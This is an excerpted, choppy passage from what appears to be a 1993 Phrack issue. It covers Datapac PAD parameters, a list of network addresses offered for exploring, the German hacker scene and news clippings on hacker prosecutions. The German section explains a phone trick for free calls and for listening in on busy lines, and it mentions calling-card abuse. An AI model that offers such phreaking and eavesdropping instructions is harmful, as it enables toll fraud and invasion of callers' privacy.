After the manual entry you will find a list of interesting sites
to explore with, enjoy....
Parameter Number: 1
Possible Values: 0 = Escape not possible.
1 = Escape is possible.
*Note: Escape from Data transfer mode may also be possible using
the break signal if parameter seven is set to eight.
2) Echo*
Parameter Number: 1
Possible Values: 0 = No echo.
1 = Echo.
Parameter Number: 3
Possible Values: 0 = No data forwarding signal.
2 = Forward on carriage return.
2 = Carriage return.
126 = All characters in columns 0 and 1
of ASCII table and the character
del of International alphabet #5.
Parameter Number: 4
Possible Values: 0 = No data forwarding on timeout is
required.
1-255 = Indicates value of the delay in
twenties of a second. (i.e., a
value of 250 makes the time wait
10 seconds)
Parameter Number: 5
Possible Values: 0 = No use of X-on/X-off.
1 = Use of X-on/X-off for auxiliary
devices.
2 = Use of X-on/X-off for
intelligent terminals.
Parameter Number: 6
Possible Values: 0 = Suppress message.
1 = Transmit message.
5 = PAD prompt (*) follows Datapac
service signals.
7) Procedure on Break
Parameter Number: 7
Possible Values: 0 = Nothing. (remain in data transfer
mode)
1 = Interrupt. (remain in data
transfer mode)
2 = Reset. (remain in data transfer
mode)
4 = Send an "indication of break"
message to the packet mode DTE.
(remain in data transfer mode)
8 = Escape from data transfer mode
(i.e., enter command mode)
16 = Discard output to terminal
activate Parameter 8 (P8:1)
(remain in data transfer mode)
21 = A combination of 1, 4 and 16.
8) Discard Output
Parameter Number: 8
Possible Values: 0 = Normal delivery of output to
terminal.
1 = Discard output to terminal.
Parameter Number: 9
Possible Values: 0 = 2 padding characters will be
inserted at 110 bps and 4
padding characters will be
inserted at higher speeds, in
command mode only. (no padding
is done in data transfer mode)
1-255 = The number of padding characters
to be inserted in both data
transfer and command mode.
Parameter Number: 11
Possible Values: 0 = 110 bps
2 = 300 bps
3 = 1200 bps
4 = 2400 bps
This is all very dry stuff (what buffer isn't?) however if you need more
info on it simply mail me.
NUA list
20500011 Bell Northern Research
39400100 Envoy (English/Francais)
30400101 Envoy (Anglais/French)
39500032 Globe and Mail
41100015,I Infoglobe
59600072 University of Athabasca
60100010 Universtiy of Alberta
67100752 ?
67100673 ?
20400177 QL
29400138 Tymnet CIS02 7770,101 'free demo'
20401338 Tymnet
41100043 CSG Infoglobe
73500023 KN Computer MCT
59100092 Keyano College (Alberta)
72400014 System Max-Daisey (VAX/VMS)
69100018 Cybershare
55500010 ?
29400263 ?
29400263 ?
67100086 Sears
67100132 Primenet
67100489 Terminal ID=VAX
67100629 (VAX/VMS)
67100632 McKim Advertising (Vancouver)
93200233 University of Manitoba
79400100 Envoy Info/Mailbox
92100086 Datapac General Info
20500011 Canole II
Beyond Dpac, there are some actual BBS's worth calling, most
however would rather not have there numbers published in Phrack. None
the less here are some stable, and relatively active BBS's:
I am sorry for what this article did not cover, in the umpteen or so
pages I have punched up, I still have covered not even a tenth
of what I would like to cover. For those who wish a reliable UG
bbs for list .ca or more info on the Dpac or wish to elicit any other
response to this article please e-mail me at [email protected]
*********************************************************************
CCC
---
Talking about the German Hacker Scene, the Chaos Computer Club (CCC) comes
to most people's mind. They are most famous for their 'NASA-Hack' and their
publications like Hackerbibel and Datenschleuder, a monthly magazine talking
about 'softer' stuff than 2600, such as MUD's, the Internet and BBS'es.
Another annually meeting from CCC members and many other hackers is at the
huge computer fare 'CeBit' in Hannover in March. The Get Together is at the
Telekom booth on Tuesday at 4pm. Usually Telekom (the German phone company)
representatives are very kind, give away phone cards (value: $4), but
usually don't have any interesting new informations.
There haven't been any hacks affiliated with the CCC for the last couple of
years. The CCC tries to get away from their former criminal image, talking
mostly about risks of computers in society, and producing lots of press
releases.
The KGB Hack
------------
Most of you might know "The Cuckoo's Egg" by Cliff Stoll. His exciting
novel talks about German Hackers hacking for the KGB.
These guys were using the German x.25 network Datex-P to get to a US
University, and from there to several hosts on the Arpa/Milnet (Internet).
They were using mostly basic knowledge to get into several UNIX and VMS
Systems, reading personal Mail and looking for documents the 'Russians'
might have been interested in.
It all ends up with the suicide (murder?) of Karl Koch, one of the hackers.
Although these hackers weren't CCC members, there is a pretty good book
from the CCC about it, containing more facts than Cliff's book:
"Hacker fuer Moskau", published by Wunderlich.
Networks
--------
I. x.25
The German x.25 System is called 'Datex-P' and has the DNIC (2624).
Dialups are in almost every area code, or can be reached locally from
everywhere. There are also Tymnet and Sprintnet Dialups available in
the major cities, with some limitations though. Tymnet won't connect you
to dpac (Datapac Canada). Sprintnet has just a true dialup in Frankfurt,
the other dialups are handled by their partner Info AG, which allow
calling most RNUAs, but most Sprintnet NUIs won't work.
There are also a couple of German systems, international hackers used to like.
The most-famous is probably Lutzifer in Hamburg, Germany. It can still
be reached from x.25 Networks like Sprintnet or Tymnet.
Around two years ago, British, American and other hackers used to trade
all kinds of codez on "Lutz". But now, Pat Sisson ("frenchkiss") from Sprintnet
Security and Dale Drew ("Bartman") from Tymnet Security, try to track
down everyone abusing their NUIs or PADs.
Before Lutzifer went up 2.5 years ago, tchh and Altos Munich were most
attractive. They were running the same simple Korn-Chat on an Altos.
There are still a couple of other x.25 Systems, which attract hackers
from all over the world, like qsd, Pegasus (in France and Switzerland) and
Secret Tectonics / sectec, a rather new semi-private Board in Germany with
x.25 and Direct Phone Dialups, uucp/Internet Mail, File and Message Bases and
all Phrack Issues as well.
II. Internet
But now, most hackers quit the x.25 scene and tried to get onto Internet.
Unlike the fast Internet connections in the USA between .edu sites,
German Internet connections are mostly routed through slow (9.6kbps or 64k)
x.25 Links.
This is mostly the fault of the German phone company 'Telekom'. They have a
monopoly on phone lines in Germany and charge 2-10 times higher fees than
American phone co's. Even local calls are US$1.50/hour.
There aren't many German Internet Sites that attract foreign hackers,
compared to US Sites that German Hackers are interested in.
There are almost no public Internet BBSes with free access in Germany.
Also, German Universities have often a pretty tight security and get
mad easily.
BBS'es are still the major hang-out besides IRC. The Amiga Scene with
its K-rad Kiddos (most of them under 18 years) used to be dominant a
couple of years ago, trading Calling Cards and new Blue Box frequencies
to call the best boards in the US to leech the latest games.
But recently, the IBM scene caught up and many guys switched from Amiga
to IBM; so over 50% of pirate boards are IBM boards now.
But recently, BBS sysops have to face hard times. A couple of months
ago, lots of BBS'es in Berlin, but also in Bavaria and North Germany
got 'busted' - raided by the police because of their illegal warez.
(see my article in Phrack 42 about it) The man behind these actions
is the lawyer 'Guenther Freiherr von Gravenreuth', who works for Acti-
vision, the SPA and BSA. He is tracking down kids with piracy as recklessly
as BBS Sysops, who sell subscriptions for a 'Disabled Upload/Download Ratio'
for around $100 a month. There have been a couple of these trials lately,
without much notice by the press. Mr Gravenreuth is also responsible for
many people's fear to put up a new BBS - especially in Bavaria where he lives.
Also, calling the favorite Board in the US is getting harder and harder,
as covered in the next Chapter.
Blueboxing used to be the favorite sport of many German traders for the
last couple of years. But some phreakers wanted to make more money,
selling the Bluebox Story to Magazines like Capital or Spiegel, or to
TV Shows. Even AT&T and the German Telecom, who seemed to be blind about
this phreaking, couldn't avoid facing the truth now - they had to do
something, not only to recover from the huge losses, but also to save
their reputation.
There are a lot of rumors and text files about the actions these phone
companies took; most of them are fakes by 'eleet' people, who don't want
the 'lamers' to keep the trunks and the eleet boards busy. But some actions
seem to be certified; e. g. Telekom bought some intelligent filter boxes
from British Telecom. These boxes should detect any C5 tones (especially
2600 Hz), being sent by phreakers; and log the number of the phreaker,
if possible.
If possible, because the Telekom doesn't have ANI in most cases. Until
recently, all phone lines used to be analog, pulse dialing lines
with huge relay switches. Then the Telekom started switching to 'modern'
digitally switched lines, which allow Touch-Tone-Dialing, and also a few
other nice features, which I want to cover now.
One of these nice features 'died' just about 3 weeks ago, because someone
informed the new magazine 'Focus'.
The trick was very simple. All you need was a digital line which allowed
you to dial touch tone, and a 'Silver Box' - a device, that allows you to
dial the digits 0...9, #, * and also A, B, C and D - many modems have
this capability too.
All you had to do was to dial 'B' + 'xxx' + 'yyyy', where 'B' is the
Silver Tone B, 'xxx' is an internal Telekom code, and 'yyyy' are the last
four digits of a phone number. The internal codes 'xxx' usually look like
010, 223, 011, and so on - they switch you to an exchange, mostly in your
own area code, but often in a different one! Notice that exchange number and
internal code are different. When you are connected to a certain exchange,
dialing the four 'yyyy' digits connects you to a certain phone number in
that exchange. This enables you to make free calls - also to different area
codes, but you have to try around to find which code matches with which
exchange. But that's not all; now the fun just begins! Imagine the number
you dial is busy... you won't hear a busy signal then, you would just be
connected into the call! You could listen to the conversation of two parties!
Imagine how much fun this could be... and imagine someone would be listening
to your private conversations!
When Telekom read the article, most area codes lost this capability;
but there are still some reported to work.
Blueboxing is getting harder and harder, MCI and AT&T keep on changing their
'Break' frequencies more rapidly (though they still use in-band CCITT C5
signalling); so more and more people offer Calling Card subscriptions, and
even more traders, who refuse paying Telekom's high fees, buy them. They
are offered mostly by Americans, Belgium people and Germans, for about $100
a month. Also, I haven't heard of any case where a German got busted for
abusing AT&T's Calling Cards; probably because Telekom can't really trace
phones lines, either technically nor legally (they may not just 'tap' phone
lines because of people's privacy).
Also, German Toll Free Numbers (they start with 0130) are getting more and
more. I would take a guess and say they grow 20%-80% a year. There isn't any
official directory nor a directory assistance for these numbers, and many
companies want these numbers to remain 'unknown' to the evil hackers, since
Telekom is asking high fees for them.
So many Germans compile and scan these numbers; there is also a semi-public
list on them by SLINK - available on many BBS'es and on local German Newsgroups.
This list also contains numbers of business companies like Microsoft,
Hewlett Packard or Dell in Austin (hi erik :) ), so it is quite useful for
'normal people' too.
There have also been reported the first PBX-like Systems in Germany; this is
quite a sensation, because German Telekom laws don't allow PBX'es, or even the
linking of two phone lines (like 3-way calling). So in fact, these Systems
weren't real PBX'es, but Merial Mail VMB Systems with the Outdial feature.
PaRtY 0n!
---------
PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
PWN PWN
PWN Phrack World News PWN
PWN PWN
PWN Compiled by Datastream Cowboy PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
The Reuter News Service says Abene was the last of the five young men
indicted in the huge 1991 computer break-in scheme to admit committing the
crimes. The group called itself "MOD," an acronym used for "Masters of
Disaster" and "Masters of Deception."
-----------------------------------------------------------------------------
China Executes Computer Intruder April 26, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From AP Newswire Sources)
-----------------------------------------------------------------------------
Thomas was a Subway enthusiast who hung around train stations and areas
where subway motormen and other subway workers hang out. A NYC subway
spokesman was quoted as saying "Buffs like to watch...pretty soon they
figure out how" [to run the train]. "This guy really knew what he was doing".
-----------------------------------------------------------------------------
Banks React To Scheme That Used Phony ATM May 13, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From AP Newswire Sources)
When people attempted to use the machine, they received a message that the
machine wasn't working correctly and gave back the card. Little did they
know that their bank account number and PIN code was recorded. The fake
machine was in place for about 2 weeks. It was removed and the thieves
began making withdrawals.
The Secret Service thinks the scammers recorded anywhere from 2000 to 3000
account numbers/pin codes but did not get a chance to counterfeit
and withdraw money except from a few hundred accounts before it
became too dangerous to continue
-----------------------------------------------------------------------------
A Brooklyn College film student, who was part of a group that allegedly broke
into computer systems operated by major telephone companies, was sentenced
yesterday to 1 year and 1 day in prison.
John Lee, 21, of Bedford Stuyvesant, also was sentenced to 200 hours of
community service, which Manhattan Federal District Court Judge Richard Owen
recommended he spend teaching others to use computers. Lee had pled guilty
December 3, 1992, to a conspiracy charge involving computer tampering, fraud
and illegal wiretapping.
_______________________________________________________________________________
Hacker Gets Prison Term For Phone Computer Tampering June 4, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Gail Appleson (The Reuter Business Report)
NEW YORK -- A computer hacker known as "Corrupt" who was part of a group that
broke into computer systems operated by major telephone companies was
sentenced Friday to one year and one day in prison.
The defendant, John Lee, 21, of New York had pleaded guilty December 3, 1992
to a conspiracy charge involving computer tampering, fraud and illegal
wiretapping.
The indictment alleges the defendants broke into computer switching systems
operated by Southwestern Bell, New York Telephone, Pacific Bell, U.S. West
and Martin Marietta Electronics Information and Missile Group.
The defendants also allegedly tampered with systems owned by the nation's
largest credit reporting companies including TRW, Trans Union and Information
America. They allegedly obtained 176 TRW credit reports on various
individuals.
The indictment alleged the group broke into the computers "to enhance their
image and prestige among other computer hackers and to harass and intimidate
rival hackers and other people they did not like."
_______________________________________________________________________________
Professional Computer Hackers First To Land In Jail Under New Law June 4, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Nicholas Hills (The Vancouver Sunds)(Page A11)
LONDON -- In Brussels, they were celebrated as the two young men who broke the
gaudy secrets of EC president Jacques Delors' expense accounts.
In Sweden, they were known as the Eight-Legged Groove Machine, bringing down
part of the country's telephone network, forcing a highly publicized apology
from a government minister who said the chaos was all due to a 'technical
fault'.
They also broke into various European defense ministry networks, academic
systems at Hull University and the financial records of the leading London
bankers, S.G. Warburg.
Neil Woods and Karl Strickland have gone to prison for six months each for
penetrating computer systems in 15 different countries. The ease with which
they conducted this exercise, and their attitude that they were simply engaging
in "intellectual joyriding," has confirmed the worst fears of legal and
technological experts that computer hacking in Europe, at least, has become a
virtually uncontrollable virus.
The case became a cause celebre because of what had happened months before in
another courtroom where a teenage computer addict who had hacked into the White
House system, the EC, and even the Tokyo Zoo -- using a $400 birthday present
from his mother -- had walked free because a jury accepted, basically, that a
computer had taken over his mind.
The case of 19-year-old Paul Bedworth, who began hacking at the age of 14, and
is now studying "artificial intelligence" at Edinburgh University, provides an
insight into why hackers have turned the new computer world into an equivalent
state of delirium tremens.
Bedworth and two young friends caused thousands of dollars worth of damage to
computer systems in Britain and abroad. They were charged with criminal
conspiracy under the Computer Misuse Act of 1990.
Bedworth never did deny computer hacking at his trial, and did not give
evidence in his defense. He simply said through his lawyer that there could
not have been any criminal intent because of his "pathological obsession" with
computers.
Until the passage of the Computer Misuse Act in 1990, hacking was legal in
Britain. Bedworth may have been found not guilty, but his activities were so
widespread that the authorities' investigation involved eight different British
police forces, and others from as far afield as Finland and Singapore. It
produced so much evidence - mostly on disk - that if it had been printed out on
ordinary laser printer paper, it is estimated that the material would have
reached a height of 42 meters.
The police were devastated by the verdict, but are now feeling somewhat better
after the conviction of Woods and Strickland.
The pair, using the nicknames of Pad and Gandalf, would spend up to six hours a
day at their computers, boasting about "smashing" databases.
-----------------------------------------------------------------------------
A jury decided Paul Bedworth, now 19, was so "hooked" he could not stop
himself hacking in to companies' systems -- allegedly costing them
thousands of dollars.
-----------------------------------------------------------------------------
Hot For The Fingertips: An Internet Meeting Of Minds May 23, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by Frank Bajak (Associated Press)
NEW YORK -- Somewhere in the ether and silicon that unite two workstations 11
floors above lower Broadway, denizens of the cyberpunk milieu are feverishly
debating whether anyone in government can be trusted.
Patrick Kroupa and Bruce Fancher are the proprietors, self-described former
Legion of Doom telephone hackers who cut the cord with computing for a time
after mid-1980s teen-age shenanigans.
Fancher is 22 and more businesslike, but equally in love with this dream he
left Tufts University for.
They've invested more than $80,000 into Mindvox, which went fully operational
in November and has more than 2,000 users, who pay $15 to $20 a month plus
telephone charges.
-----------------------------------------------------------------------------
[Margie hits the net via Mindvox. Along the way she discovers
flame wars, sexism, and a noted lack of females online. This
is her story. :) ]
-----------------------------------------------------------------------------
Ronald Mark Austin and Justin Tanner Peterson have pleaded guilty
to conspiracy and violating computer crime laws and have agreed to
help against Poulsen. Both are Los Angeles residents.
-----------------------------------------------------------------------------
A major problem with the Internet is that the "sites" from where the
software is being illegally downloaded can physically be located in countries
that do not have strong antipiracy laws, such as Italy or the former Soviet
Union. The Internet also has no central administrator or system operator.
---------------------------------------------------------------------------
Kenyon Shulman, son of Houston socialite Carolyn Farb will have to pay
15 thousand dollars to get back his 1991 BMW 325i after being impounded
when Houston police found 400 doses of the drug ecstasy in its trunk.
This is just the latest brush with authorities for Shulman who in 1988
was raided by Harris County authorities for using his personal computer
to crack AT&T codes to make free long distance calls.
--------------------------------------------------------------------------
Austin Man Gets 10 Years For Computer Theft, Sales May 6, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Jim Phillips (Austin American Statesman)(Page B3)
Jason Copson, who was arrested in July under his alias Scott Edward Berry,
has been sentenced to 10 years on each of four charges of burglary and
one count of assault. The charges will run concurrently. Copson still
faces charges in Maryland and Virginia where he served a prison term and
was serving probation for dealing in stolen goods. Police arrested Copson
and Christopher Lamprecht on July 9 during a sting in which the men tried to
sell computer chips stolen from Advanced Micro Devices.
---------------------------------------------------------------------------
Treasury Told Computer Virus Secrets June 19, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By: Joel Garreau (Washington Post) (Page A01)
For more than a year, computer virus programs that can wreak havoc with
computer systems throughout the world were made available by a U.S. government
agency to anyone with a home computer and a modem, officials acknowledged this
week.
The bulletin board, run by a security branch of the Bureau of Public Debt in
Parkersburg, W.Va., is aimed at professionals whose job it is to combat such
malicious destroyers of computer files as "The Internet Worm," "Satan's Little
Helper" and "Dark Avenger's Mutation Engine." But nothing blocked anyone else
from gaining access to the information.
At first, the AIS bulletin board contained only routine security alert
postings. But then operator Clancy "began to get underground hacker files and
post them on her board," said Bruce Sterling, author of "The Hacker Crackdown:
Law and Disorder on the Electronic Frontier." "She amassed a truly impressive
collection of underground stuff. If you don't read it, you don't know what's
going to hit you."
Clancy, 30, who is a former Air Force bomb-squad member, is highly regarded
in the computer security world. Sterling, one of the nation's foremost writers
about the computer underground, called her "probably the best there is in the
federal government who's not military or NSA (National Security Agency).
Probably better than most CIA."
-----------------------------------------------------------------------------
DALLAS DIVISION
-----------------------------------
THE UNITED STATES OF AMERICA *
*
V. * CRIMINAL NO. 3-91-194-T
* (FILED UNDER SEAL)
JUSTIN TANNER PETERSEN (1) *
requests that this Honorable Court seal the record in this case.
Respectfully submitted,
MARVIN COLLINS
United States Attorney
LEONARD A. SENEROTE
Assistant United States Attorney
Texas State Bar No. 18024700
1100 Commerce Street, Room 16G28
Dallas, Texas 75242-1699
(214) 767-0951
CERTIFICATE OF CONFERENCE
The defendant joins in this motion.
LEONARD A. SENEROTE
Assistant United States Attorney